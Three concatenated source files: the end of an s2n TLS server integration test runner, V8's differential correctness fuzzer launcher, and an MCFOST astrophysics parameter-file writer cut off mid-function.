ret = try_handshake(host, port, client_ciphers, S2N_TLS12, server_name=client_sni,
expected_extensions = [TlsExtensionServerName] if expect_hostname_match == True else None,
strict_hostname=expect_hostname_match, server_cert_key_list=cert_key_list, expected_server_cert=expected_cert_path)
result_prefix = "\nDescription: %s\n\nclient_sni: %s\nclient_ciphers: %s\nexpected_cert: %s\nexpect_hostname_match: %s\nresult: " % (test_case.description,
client_sni,
client_ciphers,
expected_cert_path,
expect_hostname_match)
print_result(result_prefix, ret)
if ret != 0:
return ret
return 0
def main():
parser = argparse.ArgumentParser(description='Runs TLS server integration tests against s2nd using Openssl s_client')
parser.add_argument('host', help='The host for s2nd to bind to')
parser.add_argument('port', type=int, help='The port for s2nd to bind to')
parser.add_argument('--use_corked_io', action='store_true', help='Turn corked IO on/off')
parser.add_argument('--libcrypto', default='openssl-1.1.1', choices=['openssl-1.0.2', 'openssl-1.0.2-fips', 'openssl-1.1.1', 'libressl'],
help="""The Libcrypto that s2n was built with. s2n supports different cipher suites depending on
libcrypto version. Defaults to openssl-1.1.1.""")
args = parser.parse_args()
use_corked_io = args.use_corked_io
# Retrieve the test ciphers to use based on the libcrypto version s2n was built with
test_ciphers = S2N_LIBCRYPTO_TO_TEST_CIPHERS[args.libcrypto]
host = args.host
port = args.port
fips_mode = False
if environ.get("S2N_TEST_IN_FIPS_MODE") is not None:
fips_mode = True
print("\nRunning s2nd in FIPS mode.")
print("\nRunning tests with: " + os.popen('openssl version').read())
if use_corked_io == True:
print("Corked IO is on")
failed = 0
failed += resume_test(host, port, test_ciphers, fips_mode, no_ticket=True)
failed += resume_test(host, port, test_ciphers, fips_mode)
failed += handshake_test(host, port, test_ciphers, fips_mode)
failed += client_auth_test(host, port, test_ciphers, fips_mode)
failed += sigalg_test(host, port, fips_mode)
failed += sigalg_test(host, port, fips_mode, use_client_auth=True, no_ticket=True)
failed += elliptic_curve_test(host, port, fips_mode)
failed += elliptic_curve_fallback_test(host, port, fips_mode)
failed += handshake_fragmentation_test(host, port, fips_mode)
failed += ocsp_stapling_test(host, port, fips_mode)
failed += cert_type_cipher_match_test(host, port)
failed += multiple_cert_type_test(host, port)
failed += multiple_cert_domain_name_test(host, port)
return failed
if __name__ == "__main__":
sys.exit(main())
|
|
#!/usr/bin/env python
# Copyright 2016 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
V8 correctness fuzzer launcher script.
"""
import argparse
import hashlib
import itertools
import json
import os
import re
import sys
import traceback
import v8_commands
import v8_suppressions
CONFIGS = dict(
default=[],
validate_asm=['--validate-asm'], # Maybe add , '--disable-asm-warnings'
fullcode=['--nocrankshaft', '--turbo-filter=~'],
noturbo=['--turbo-filter=~', '--noturbo-asm'],
noturbo_opt=['--always-opt', '--turbo-filter=~', '--noturbo-asm'],
ignition_staging=['--ignition-staging'],
ignition_turbo=['--ignition-staging', '--turbo'],
ignition_turbo_opt=['--ignition-staging', '--turbo', '--always-opt'],
)
# Timeout in seconds for one d8 run.
TIMEOUT = 3
# Return codes.
RETURN_PASS = 0
RETURN_FAIL = 2
BASE_PATH = os.path.dirname(os.path.abspath(__file__))
PREAMBLE = [
os.path.join(BASE_PATH, 'v8_mock.js'),
os.path.join(BASE_PATH, 'v8_suppressions.js'),
]
FLAGS = ['--abort_on_stack_overflow', '--expose-gc', '--allow-natives-syntax',
'--invoke-weak-callbacks', '--omit-quit', '--es-staging']
SUPPORTED_ARCHS = ['ia32', 'x64', 'arm', 'arm64']
# Output for suppressed failure case.
FAILURE_HEADER_TEMPLATE = """#
# V8 correctness failure
# V8 correctness configs: %(configs)s
# V8 correctness sources: %(sources)s
# V8 correctness suppression: %(suppression)s
"""
# Extended output for failure case. The 'CHECK' is for the minimizer.
FAILURE_TEMPLATE = FAILURE_HEADER_TEMPLATE + """#
# CHECK
#
# Compared %(first_config_label)s with %(second_config_label)s
#
# Flags of %(first_config_label)s:
%(first_config_flags)s
# Flags of %(second_config_label)s:
%(second_config_flags)s
#
# Difference:
%(difference)s
#
### Start of configuration %(first_config_label)s:
%(first_config_output)s
### End of configuration %(first_config_label)s
#
### Start of configuration %(second_config_label)s:
%(second_config_output)s
### End of configuration %(second_config_label)s
"""
FUZZ_TEST_RE = re.compile(r'.*fuzz(-\d+\.js)')
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'--random-seed', type=int, required=True,
help='random seed passed to both runs')
parser.add_argument(
'--first-arch', help='first architecture', default='x64')
parser.add_argument(
'--second-arch', help='second architecture', default='x64')
parser.add_argument(
'--first-config', help='first configuration', default='fullcode')
parser.add_argument(
'--second-config', help='second configuration', default='fullcode')
parser.add_argument(
'--first-d8', default='d8',
help='optional path to first d8 executable, '
'default: bundled in the same directory as this script')
parser.add_argument(
'--second-d8',
help='optional path to second d8 executable, default: same as first')
parser.add_argument('testcase', help='path to test case')
options = parser.parse_args()
# Ensure we make a sane comparison.
assert (options.first_arch != options.second_arch or
options.first_config != options.second_config) , (
'Need either arch or config difference.')
assert options.first_arch in SUPPORTED_ARCHS
assert options.second_arch in SUPPORTED_ARCHS
assert options.first_config in CONFIGS
assert options.second_config in CONFIGS
# Ensure we have a test case.
assert (os.path.exists(options.testcase) and
os.path.isfile(options.testcase)), (
'Test case %s doesn\'t exist' % options.testcase)
# Deduce metadata file name from test case. This also removes
# the prefix the test case might get during minimization.
suffix = FUZZ_TEST_RE.match(os.path.basename(options.testcase)).group(1)
options.meta_data_path = os.path.join(
os.path.dirname(options.testcase), 'meta' + suffix)
assert os.path.exists(options.meta_data_path), (
'Metadata %s doesn\'t exist' % options.meta_data_path)
# Use first d8 as default for second d8.
options.second_d8 = options.second_d8 or options.first_d8
# Ensure absolute paths.
if not os.path.isabs(options.first_d8):
options.first_d8 = os.path.join(BASE_PATH, options.first_d8)
if not os.path.isabs(options.second_d8):
options.second_d8 = os.path.join(BASE_PATH, options.second_d8)
# Ensure executables exist.
assert os.path.exists(options.first_d8)
assert os.path.exists(options.second_d8)
# Ensure we use different executables when we claim we compare
# different architectures.
# TODO(machenbach): Infer arch from gn's build output.
if options.first_arch != options.second_arch:
assert options.first_d8 != options.second_d8
return options
def test_pattern_bailout(testcase, ignore_fun):
"""Print failure state and return if ignore_fun matches testcase."""
with open(testcase) as f:
bug = (ignore_fun(f.read()) or '').strip()
if bug:
print FAILURE_HEADER_TEMPLATE % dict(
configs='', sources='', suppression=bug)
return True
return False
def pass_bailout(output, step_number):
"""Print info and return if in timeout or crash pass states."""
if output.HasTimedOut():
# Dashed output, so that no other clusterfuzz tools can match the
# words timeout or crash.
print '# V8 correctness - T-I-M-E-O-U-T %d' % step_number
return True
if output.HasCrashed():
print '# V8 correctness - C-R-A-S-H %d' % step_number
return True
return False
def fail_bailout(output, ignore_by_output_fun):
"""Print failure state and return if ignore_by_output_fun matches output."""
bug = (ignore_by_output_fun(output.stdout) or '').strip()
if bug:
print FAILURE_HEADER_TEMPLATE % dict(
configs='', sources='', suppression=bug)
return True
return False
def main():
options = parse_args()
# Suppressions are architecture and configuration specific.
suppress = v8_suppressions.get_suppression(
options.first_arch, options.first_config,
options.second_arch, options.second_config,
)
if test_pattern_bailout(options.testcase, suppress.ignore):
return RETURN_FAIL
# Get metadata.
with open(options.meta_data_path) as f:
metadata = json.load(f)
common_flags = FLAGS + ['--random-seed', str(options.random_seed)]
first_config_flags = common_flags + CONFIGS[options.first_config]
second_config_flags = common_flags + CONFIGS[options.second_config]
def run_d8(d8, config_flags):
args = [d8] + config_flags + PREAMBLE + [options.testcase]
if d8.endswith('.py'):
# Wrap with python in tests.
args = [sys.executable] + args
return v8_commands.Execute(
args,
cwd=os.path.dirname(options.testcase),
timeout=TIMEOUT,
)
first_config_output = run_d8(options.first_d8, first_config_flags)
# Early bailout based on first run's output.
if pass_bailout(first_config_output, 1):
return RETURN_PASS
if fail_bailout(first_config_output, suppress.ignore_by_output1):
return RETURN_FAIL
second_config_output = run_d8(options.second_d8, second_config_flags)
# Bailout based on second run's output.
if pass_bailout(second_config_output, 2):
return RETURN_PASS
if fail_bailout(second_config_output, suppress.ignore_by_output2):
return RETURN_FAIL
difference = suppress.diff(
first_config_output.stdout, second_config_output.stdout)
if difference:
# The first three entries will be parsed by clusterfuzz. Format changes
# will require changes on the clusterfuzz side.
first_config_label = '%s,%s' % (options.first_arch, options.first_config)
second_config_label = '%s,%s' % (options.second_arch, options.second_config)
hsh = lambda x: hashlib.sha1(x).hexdigest()[:8]
print FAILURE_TEMPLATE % dict(
configs='%s:%s' % (first_config_label, second_config_label),
sources=','.join(map(hsh, metadata['sources'])),
suppression='', # We can't tie bugs to differences.
first_config_label=first_config_label,
second_config_label=second_config_label,
first_config_flags=' '.join(first_config_flags),
second_config_flags=' '.join(second_config_flags),
first_config_output=first_config_output.stdout,
second_config_output=second_config_output.stdout,
difference=difference,
)
return RETURN_FAIL
# TODO(machenbach): Figure out if we could also return a bug in case there's
# no difference, but one of the line suppressions has matched - and without
# the match there would be a difference.
print '# V8 correctness - pass'
return RETURN_PASS
if __name__ == "__main__":
try:
result = main()
except SystemExit:
# Make sure clusterfuzz reports internal errors and wrong usage.
# Use one label for all internal and usage errors.
print FAILURE_HEADER_TEMPLATE % dict(
configs='', sources='', suppression='wrong_usage')
result = RETURN_FAIL
except Exception as e:
print FAILURE_HEADER_TEMPLATE % dict(
configs='', sources='', suppression='internal_error')
print '# Internal error: %s' % e
traceback.print_exc(file=sys.stdout)
result = RETURN_FAIL
sys.exit(result)
|
|
import os
import numpy as np
import matplotlib
import logging
import glob
import astropy, astropy.io.ascii
_log = logging.getLogger('mcfostpy')
# this lets you put "stop()" in your code to have a debugger breakpoint
from IPython.core.debugger import Tracer; stop = Tracer()
# some extremely simple classes to serve as structs.
class Paramfile:
""" Object class interface to MCFOST parameter files
Example:
par = Parfile('somefile.par')
"""
_minimum_version = 2.15 # minimum MCFOST version for this code to run
def __init__(self, path):
""" Set initial parameter values.
THESE ARE JUST DEFINITIONS, NO NEED TO CHANGE THIS PART UNLESS A VERY
SPECIFIC PARAMETER MUST BE CHANGED
"""
self.path = path # path to save the file to
self.version = '2.19' # MCFOST version.
# Number of photon packages
self.nbr_photons_eq_th = np.nan # T computation
self.nbr_photons_lambda = np.nan # SED computation
self.nbr_photons_image = np.nan # image computation
# Wavelength
self.n_lambda = np.nan # micron
self.lambda_min = np.nan # micron
self.lambda_max = np.nan # micron
self.use_default_wavelength_grid = 'T'
self.compute_teff = 'T'
self.compute_sed = 'T'
self.use_default_wavelength_grid = 'T' # compute temperature, compute sed, use default wavelength grid
self.wavelength_file = 'chose_it.lambda' # wavelength file (if previous parameter is F)
self.separate_contributions = 'F' # Separate contributions
self.compute_stokes = 'F'
# Grid geometry and size
self.grid_geometry = np.nan # 1 = cylindrical, 2 = spherical, 3 = Voronoi tesselation (this is in beta, please ask Christophe)
self.grid_n_rad = np.nan # n_rad (log distribution)
self.grid_nz = np.nan # nz (or n_theta)
self.grid_n_az = np.nan # n_az
self.grid_n_rad_in = np.nan # n_rad_in
#Maps
self.map_grid_nx = np.nan
self.map_grid_ny = np.nan
self.map_grid_size = np.nan # AU
self.mc = np.nan # N bins inclination for the MC phase
self.mc_n_bin_incl = 1
self.mc_n_bin_az = 1 # This parameter is not used by the user
self.rt_imin = 45.
self.rt_imax = 45.
self.rt_n_incl = 1.
self.rt_is_centered = 'F'
self.distance = np.nan # distance (pc)
self.pa = 0. # disk PA
# Scattering method
self.scattering_method = 0 # 0=auto, 1=grain prop, 2=cell prop
self.scattering_theory = 1 # 1=Mie, 2=hg (2 implies the loss of polarizarion)
# Symetries
self.image_symmetry = 'T' # image symmetry
self.central_symmetry = 'T' # central symmetry
self.axial_symmetry = 'T' # axial symmetry (important only if N_phi > 1)
# Disk physics
self.dust_settling = 0
self.dust_exp_strat = 0.50
self.dust_a_strat = 1.
self.dust_radial_migration = 'F' # dust radial migration
self.dust_sublimate_dust = 'F' # sublimate dust
self.dust_hydrostatic_eq = 'F' # hydostatic equilibrium
self.dust_viscous_heating = 'F' # viscous heating
self.dust_alpha_viscosity = 0.2
# Number of zones : 1 zone = 1 density structure + corresponding grain properties
self.n_zones = 1 # number of zones
# ZONES
#### We will define here 3 zones just in case, and use them only if n_zones is > 1
# Zone1
self.zone1_type = 1 # zone type : 1 = disk, 2 = tappered-edge disk, 3 = envelope, 4 = debris disk, 5 = wall
self.zone1_dust_mass = np.nan # dust mass
self.zone1_gas_to_dust_mass_ratio = 100.
self.zone1_scale_height = np.nan # scale height
self.zone1_ref_radius = np.nan # reference radius (AU), unused for envelope
self.zone1_vert_profile_exp = 2 # vertical profile exponent (only for debris disk)
self.zone1_rin = np.nan
self.zone1_edge = 0.0
self.zone1_rout = np.nan
self.zone1_rc = 80. # Rc (AU) Rc is only used for tappered-edge disks (Rout set to 8*Rc if Rout==0)
self.zone1_flaring_exp = np.nan # flaring exponent, unused for envelope
self.zone1_surf_density_exp = np.nan # surface density exponent (or -gamma for tappered-edge disk), usually < 0
self.zone1_minusgamma_exp = 0.0 # -gamma_exp (or alpha_in & alpha_out for debris disk)
# Zone2
self.zone2_type = 1 # zone type : 1 = disk, 2 = tappered-edge disk, 3 = envelope, 4 = debris disk, 5 = wall
self.zone2_dust_mass = np.nan # dust mass
self.zone2_gas_to_dust_mass_ratio = 100.
self.zone2_scale_height = np.nan # scale height
self.zone2_ref_radius = np.nan # reference radius (AU), unused for envelope
self.zone2_vert_profile_exp = 2 # vertical profile exponent (only for debris disk)
self.zone2_rin = np.nan
self.zone2_edge = 0.0
self.zone2_rout = np.nan
self.zone2_rc = 80. # Rc (AU) Rc is only used for tappered-edge disks (Rout set to 8*Rc if Rout==0)
self.zone2_flaring_exp = np.nan # flaring exponent, unused for envelope
self.zone2_surf_density_exp = np.nan # surface density exponent (or -gamma for tappered-edge disk), usually < 0
self.zone2_minusgamma_exp = 0.0 # -gamma_exp (or alpha_in & alpha_out for debris disk)
# Zone3
self.zone3_type = 1 # zone type : 1 = disk, 2 = tappered-edge disk, 3 = envelope, 4 = debris disk, 5 = wall
self.zone3_dust_mass = np.nan # dust mass
self.zone3_gas_to_dust_mass_ratio = 100.
self.zone3_scale_height = np.nan # scale height
self.zone3_ref_radius = np.nan # reference radius (AU), unused for envelope
self.zone3_vert_profile_exp = 2 # vertical profile exponent (only for debris disk)
self.zone3_rin = np.nan
self.zone3_edge = 0.0
self.zone3_rout = np.nan
self.zone3_rc = 80. # Rc (AU) Rc is only used for tappered-edge disks (Rout set to 8*Rc if Rout==0)
self.zone3_flaring_exp = np.nan # flaring exponent, unused for envelope
self.zone3_surf_density_exp = np.nan # surface density exponent (or -gamma for tappered-edge disk), usually < 0
self.zone3_minusgamma_exp = 0.0 # -gamma_exp (or alpha_in & alpha_out for debris disk)
# Cavity : everything is empty above the surface
self.is_cavity = 'F' # cavity
self.cavity_heigh = 15. # height
self.cavity_ref_radius = 50. # reference radius (AU)
self.cavity_flaring = 1.5 # flaring exponent
# GRAINS
### Grain properties suffer from the same "problem" that disk zones, so will put three.
# Grain 1
self.grain1_n_species = 1 # Number of species
self.grain1_type = 'Mie' # Grain type (Mie or DHS)
self.grain1_n_components = 1
self.grain1_mixing_rule = 2 # Mixing rule (1 = EMT or 2 = coating)
self.grain1_porosity = 0.0
self.grain1_mass_fract = 1.0
self.grain1_vmax = 0.9 # Vmax (for DHS)
self.grain1_dust_file = 'Draine_Si_sUV.dat' # Optical indices file
self.grain1_dust_volume = 1.0 # Volume fraction
self.grain1_heating_method = 1 # Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE
self.grain1_amin = 0.03 # amin (um)
self.grain1_amax = 1000.0 # amax (um)
self.grain1_aexp = 3.5 # aexp
self.grain1_n_grains = 50 # n_grains (log distrib)
# Zone 2
self.grain2_n_species = 1 # Number of species
self.grain2_type = 'Mie' # Grain type (Mie or DHS)
self.grain2_n_components = 1
self.grain2_mixing_rule = 2 # Mixing rule (1 = EMT or 2 = coating)
self.grain2_porosity = 0.0
self.grain2_mass_fract = 1.0
self.grain2_vmax = 0.9 # Vmax (for DHS)
self.grain2_dust_file = 'Draine_Si_sUV.dat' # Optical indices file
self.grain2_dust_volume = 1.0 # Volume fraction
self.grain2_heating_method = 1 # Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE
self.grain2_amin = 0.03 # amin (um)
self.grain2_amax = 1000.0 # amax (um)
self.grain2_aexp = 3.5 # aexp
self.grain2_n_grains = 50 # n_grains (log distrib)
# Zone 3
self.grain3_n_species = 1 # Number of species
self.grain3_type = 'Mie' # Grain type (Mie or DHS)
self.grain3_n_components = 1
self.grain3_mixing_rule = 2 # Mixing rule (1 = EMT or 2 = coating)
self.grain3_porosity = 0.0
self.grain3_mass_fract = 1.0
self.grain3_vmax = 0.9 # Vmax (for DHS)
self.grain3_dust_file = 'Draine_Si_sUV.dat' # Optical indices file
self.grain3_dust_volume = 1.0 # Volume fraction
self.grain3_heating_method = 1 # Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE
self.grain3_amin = 0.03 # amin (um)
self.grain3_amax = 1000.0 # amax (um)
self.grain3_aexp = 3.5 # aexp
self.grain3_n_grains = 50 # n_grains (log distrib)
### I WILL NOT DO ANY MOLECULAR STUFF. INSTEAD, I WILL COPY THE PARAGRAPHS EXACTLY AS IN THE ORIGINAL FILE. NO USE ANYWAY
#Star properties
self.n_stars = 1 # Number of stars
# star 1
self.star1_teff = np.nan
self.star1_radius = np.nan
self.star1_mass = np.nan
self.star1_x = 0. # AU
self.star1_y = 0. # AU
self.star1_z = 0. # AU
self.star1_blackbody = 'F'
self.star1_spectrum = np.nan
self.star1_fUV = 0.
self.star1_slopefUV = 2.2
# star 2
self.star2_teff = np.nan
self.star2_radius = np.nan
self.star2_mass = np.nan
self.star2_x = 0. # AU
self.star2_y = 0. # AU
self.star2_z = 0. # AU
self.star2_blackbody = 'F'
self.star2_spectrum = np.nan
self.star2_fUV = 0.
self.star2_slopefUV = 2.2
# star 3
self.star3_teff = np.nan
self.star3_radius = np.nan
self.star3_mass = np.nan
self.star3_x = 0. # AU
self.star3_y = 0. # AU
self.star3_z = 0. # AU
self.star3_blackbody = 'F'
self.star3_spectrum = np.nan
self.star3_fUV = 0.
self.star3_slopefUV = 2.2
def writeFile(self):
""" Write an MCFOST file.
It assumes I am clever enough to get all the variable definitions right... """
mcfost_file = open(self.path,'w')
# version
mcfost_file.write(str(self.version) +' mcfost version \n')
mcfost_file.write('\n')
# Number of photon packages
mcfost_file.write('#Number of photon packages\n')
mcfost_file.write(' {:.3e}'.format(float(self.nbr_photons_eq_th))+' nbr_photons_eq_th : T computation\n')
mcfost_file.write(' {:.3e}'.format(float(self.nbr_photons_lambda))+' nbr_photons_lambda : SED computation\n')
mcfost_file.write(' {:.3e}'.format(float(self.nbr_photons_image))+' nbr_photons_image : images computation\n')
mcfost_file.write('\n')
# Wavelength
mcfost_file.write('#Wavelength\n')
values = ' {:} '.format(int(self.n_lambda)) + '{:2e} '.format(float(self.lambda_min)) + '{:.2e} '.format(float(self.lambda_max))
mcfost_file.write(values + ' n_lambda, lambda_min, lambda_max [mum]\n')
values = ' ' + self.use_default_wavelength_grid + ' ' + self.compute_teff + ' ' + self.compute_sed
mcfost_file.write(values + ' compute temperature?, compute sed?, use default wavelength grid ?\n')
mcfost_file.write(' ' + self.wavelength_file + ' wavelength file (if previous parameter is F)\n')
values = ' ' + self.separate_contributions + ' ' +self.compute_stokes
mcfost_file.write(' ' + values + ' separation of different contributions?, stokes parameters?\n')
mcfost_file.write('\n')
# Grid geometry and size
mcfost_file.write('#Grid geometry and size\n')
mcfost_file.write(' {:} '.format(int(self.grid_geometry)) + \
' 1 = cylindrical, 2 = spherical, 3 = Voronoi tesselation (this is in beta, please ask Christophe)\n')
values = ' {:} '.format(int(self.grid_n_rad)) + '{:} '.format(int(self.grid_nz)) +\
'{:} '.format(int(self.grid_n_az)) + '{:} '.format(int(self.grid_n_rad_in))
mcfost_file.write(values + ' n_rad (log distribution), nz (or n_theta), n_az, n_rad_in\n')
mcfost_file.write('\n')
# Maps
mcfost_file.write('#Maps\n')
values = ' {:} '.format(int(self.map_grid_nx)) + '{:} '.format(int(self.map_grid_nx)) + '{:.3} '.format(float(self.map_grid_size))
mcfost_file.write(values + ' grid (nx,ny), size [AU]\n')
values = ' {:} '.format(int(self.mc)) + '{:} '.format(int(self.mc_n_bin_incl)) + '{:} '.format(int(self.mc_n_bin_az))
mcfost_file.write(values + ' MC : N_bin_incl, N_bin_az\n')
values = ' {:.3} '.format(float(self.rt_imin)) + '{:.3} '.format(float(self.rt_imax)) +\
'{:} '.format(int(self.rt_n_incl)) + ' ' + self.rt_is_centered
mcfost_file.write(values + ' RT: imin, imax, n_incl, centered ?\n')
mcfost_file.write(' {:.3} '.format(float(self.distance)) + ' distance (pc)\n')
mcfost_file.write(' {:.3} '.format(float(self.pa)) + ' disk PA\n')
mcfost_file.write('\n')
# Scattering method
mcfost_file.write('#Scattering method\n')
mcfost_file.write(' {:} '.format(int(self.scattering_method)) + ' 0=auto, 1=grain prop, 2=cell prop\n')
mcfost_file.write(' {:} '.format(int(self.scattering_theory)) + ' 1=Mie, 2=hg (2 implies the loss of polarizarion)\n')
mcfost_file.write('\n')
# Symmetries
mcfost_file.write('#Symmetries\n')
mcfost_file.write(' ' + self.image_symmetry + ' image symmetry\n')
mcfost_file.write(' ' + self.central_symmetry + ' central symmetry\n')
mcfost_file.write(' ' + self.axial_symmetry + ' axial symmetry (important only if N_phi > 1)\n')
mcfost_file.write('\n')
# Disk physics
mcfost_file.write('#Disk physics\n')
values = ' {:} '.format(int(self.dust_settling)) + '{:.3} '.format(float(self.dust_exp_strat)) + '{:.3} '.format(float(self.dust_a_strat))
mcfost_file.write(values + ' dust_settling (0=no settling, 1=parametric, 2=Dubrulle, 3=Fromang), exp_strat, a_strat (for parametric settling)\n')
mcfost_file.write(' ' + self.dust_radial_migration + ' dust radial migration\n')
mcfost_file.write(' ' + self.dust_sublimate_dust + ' sublimate\n')
mcfost_file.write(' ' + self.dust_hydrostatic_eq + ' hydostatic equilibrium\n')
mcfost_file.write(' ' + self.dust_viscous_heating + ' '+'{:1e}'.format(float(self.dust_alpha_viscosity)) + ' viscous heating, alpha_viscosity\n')
mcfost_file.write('\n')
# Number of zones
mcfost_file.write('#Number of zones : 1 zone = 1 density structure + corresponding grain properties\n')
mcfost_file.write(' {:} '.format(int(self.n_zones))+'\n')
mcfost_file.write('\n')
# Density structure
mcfost_file.write('#Density structure\n')
## Zone 1, which exisits for sure
mcfost_file.write(' {:} '.format(int(self.zone1_type)) + ' zone type : 1 = disk, 2 = tappered-edge disk, 3 = envelope, 4 = debris disk, 5 = wall\n')
values = ' {:.3e} '.format(float(self.zone1_dust_mass)) + '{:.3} '.format(float(self.zone1_gas_to_dust_mass_ratio))
mcfost_file.write(values + ' dust mass, gas-to-dust mass ratio\n')
values = ' {:.3e} '.format(float(self.zone1_scale_height)) + '{:.3} '.format(float(self.zone1_ref_radius)) +\
'{:.3} '.format(float(self.zone1_vert_profile_exp))
mcfost_file.write(values + ' scale height, reference radius (AU), unused for envelope, vertical profile exponent (only for debris disk)\n')
values = ' {:.3e} '.format(float(self.zone1_rin)) + '{:.3} '.format(float(self.zone1_edge)) +\
'{:.3} '.format(float(self.zone1_rout))+ '{:.3} '.format(float(self.zone1_rc))
mcfost_file.write(values + ' Rin, edge, Rout, Rc (AU) Rc is only used for tappered-edge & debris disks (Rout set to 8*Rc if Rout==0)\n')
mcfost_file.write(' {:.3} '.format(float(self.zone1_flaring_exp)) + ' flaring exponent, unused for envelope\n')
values = ' {:.3} '.format(float(self.zone1_surf_density_exp)) + '{:.3} '.format(float(self.zone1_minusgamma_exp))
mcfost_file.write(values + ' surface density exponent (or -gamma for tappered-edge disk or volume density for envelope),'+\
' usually < 0, -gamma_exp (or alpha_in & alpha_out for debris disk)\n')
## Zone 2 if needed
if self.n_zones > 1:
mcfost_file.write(' {:} '.format(int(self.zone2_type)) + ' zone type : 1 = disk, 2 = tappered-edge disk,'+\
' 3 = envelope, 4 = debris disk, 5 = wall\n')
values = ' {:.3e} '.format(float(self.zone2_dust_mass)) + '{:.3} '.format(float(self.zone2_gas_to_dust_mass_ratio))
mcfost_file.write(values + ' dust mass, gas-to-dust mass ratio\n')
values = ' {:.3e} '.format(float(self.zone2_scale_height)) + '{:.3} '.format(float(self.zone2_ref_radius)) +\
'{:.3} '.format(float(self.zone2_vert_profile_exp))
mcfost_file.write(values + ' scale height, reference radius (AU), unused for envelope, vertical profile exponent (only for debris disk)\n')
values = ' {:.3e} '.format(float(self.zone2_rin)) + '{:.3} '.format(float(self.zone2_edge)) +\
'{:.3} '.format(float(self.zone2_rout))+ '{:.3} '.format(float(self.zone2_rc))
mcfost_file.write(values + ' Rin, edge, Rout, Rc (AU) Rc is only used for tappered-edge & debris disks (Rout set to 8*Rc if Rout==0)\n')
mcfost_file.write(' {:.3} '.format(float(self.zone2_flaring_exp)) + ' flaring exponent, unused for envelope\n')
values = ' {:.3} '.format(float(self.zone2_surf_density_exp)) + '{:.3} '.format(float(self.zone2_minusgamma_exp))
mcfost_file.write(values + ' surface density exponent (or -gamma for tappered-edge disk or volume density for envelope),'+\
' usually < 0, -gamma_exp (or alpha_in & alpha_out for debris disk)\n')
## Zone 3 if needed
if self.n_zones > 2:
mcfost_file.write(' {:} '.format(int(self.zone3_type)) + ' zone type : 1 = disk, 2 = tappered-edge disk,'+\
' 3 = envelope, 4 = debris disk, 5 = wall\n')
values = ' {:.3e} '.format(float(self.zone_3dust_mass)) + '{:.3} '.format(float(self.zone_3gas_to_dust_mass_ratio))
mcfost_file.write(values + ' dust mass, gas-to-dust mass ratio\n')
values = ' {:.3e} '.format(float(self.zone_3scale_height)) + '{:.3} '.format(float(self.zone_3ref_radius)) +\
'{:.3} '.format(float(self.zone_3vert_profile_exp))
mcfost_file.write(values + ' scale height, reference radius (AU), unused for envelope, vertical profile exponent (only for debris disk)\n')
values = ' {:.3e} '.format(float(self.zone_3rin)) + '{:.3} '.format(float(self.zone_3edge)) +\
'{:.3} '.format(float(self.zone_3rout))+ '{:.3} '.format(float(self.zone_3rc))
mcfost_file.write(values + ' Rin, edge, Rout, Rc (AU) Rc is only used for tappered-edge & debris disks (Rout set to 8*Rc if Rout==0)\n')
mcfost_file.write(' {:.3} '.format(float(self.zone_3flaring_exp)) + ' flaring exponent, unused for envelope\n')
values = ' {:.3} '.format(float(self.zone_3surf_density_exp)) + '{:.3} '.format(float(self.zone_3minusgamma_exp))
mcfost_file.write(values + ' surface density exponent (or -gamma for tappered-edge disk or volume density for envelope),'+\
' usually < 0, -gamma_exp (or alpha_in & alpha_out for debris disk)\n')
mcfost_file.write('\n')
# Cavity
mcfost_file.write('#Cavity : everything is empty above the surface\n')
mcfost_file.write(' ' + self.is_cavity + ' cavity ?\n')
values = ' {:.3} '.format(float(self.cavity_heigh)) + '{:.3} '.format(float(self.cavity_ref_radius))
mcfost_file.write(values + ' height, reference radius (AU)\n')
mcfost_file.write(' {:.3} '.format(float(self.cavity_flaring))+ ' flaring exponent\n')
mcfost_file.write('\n')
# Grains
mcfost_file.write('#Grain properties\n')
## Grain 1, which exist for sure
mcfost_file.write(' {:} '.format(int(self.grain1_n_species))+ ' Number of species\n')
values = ' ' + self.grain1_type + ' {:} '.format(int(self.grain1_n_components)) + '{:} '.format(int(self.grain1_mixing_rule)) +\
'{:.3} '.format(float(self.grain1_porosity)) + '{:.3} '.format(float(self.grain1_mass_fract))+ '{:.3} '.format(float(self.grain1_vmax))
mcfost_file.write(values + ' Grain type (Mie or DHS), N_components, mixing rule (1 = EMT or 2 = coating),'+\
' porosity, mass fraction, Vmax (for DHS)\n')
values = ' ' + self.grain1_dust_file + ' {:.3} '.format(float(self.grain1_dust_volume))
mcfost_file.write(values + ' Optical indices file, volume fraction\n')
mcfost_file.write(' {:} '.format(int(self.grain1_heating_method)) + ' Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE\n')
values = ' {:.3} '.format(float(self.grain1_amin )) + '{:.3} '.format(float(self.grain1_amax)) +\
'{:.3} '.format(float(self.grain1_aexp)) + '{:} '.format(int(self.grain1_n_grains))
mcfost_file.write(values + ' amin, amax [mum], aexp, n_grains (log distribution)\n')
## Grain 2 if needed
if self.n_zones > 1:
mcfost_file.write(' {:} '.format(int(self.grain2_n_species))+ ' Number of species\n')
values = ' ' + self.grain2_type + ' {:} '.format(int(self.grain2_n_components)) + '{:} '.format(int(self.grain2_mixing_rule)) +\
'{:.3} '.format(float(self.grain2_porosity)) + '{:.3} '.format(float(self.grain2_mass_fract))+ '{:.3} '.format(float(self.grain2_vmax))
mcfost_file.write(values + ' Grain type (Mie or DHS), N_components, mixing rule (1 = EMT or 2 = coating),'+\
' porosity, mass fraction, Vmax (for DHS)\n')
values = ' ' + self.grain2_dust_file + ' {:.3} '.format(float(self.grain2_dust_volume))
mcfost_file.write(values + ' Optical indices file, volume fraction\n')
mcfost_file.write(' {:} '.format(int(self.grain2_heating_method)) + ' Heating method : 1 = RE + LTE, 2 = RE + NLTE, 3 = NRE\n')
values = ' {:.3} '.format(float(self.grain2_amin )) + '{:.3} '.format(float(self.grain2_amax)) +\
'{:.3} '.format(float(self.grain2_aexp)) + '{:} '.format(int(self.grain2_n_grains))
mcfost_file.write(values + ' amin, amax [mum], aexp, n_grains (log distribution)\n')
## Grain 3 if needed
if self.n_zones > 1:
mcfost_file.write(' {:} '.format(int(self.grain3_n_species))+ ' Number of species\n')
values = ' ' + self.grain3_type + ' {:} '.format(int(self.grain3_n_components)) + '{:} '.format(int(self.grain3_mixing_rule)) +\
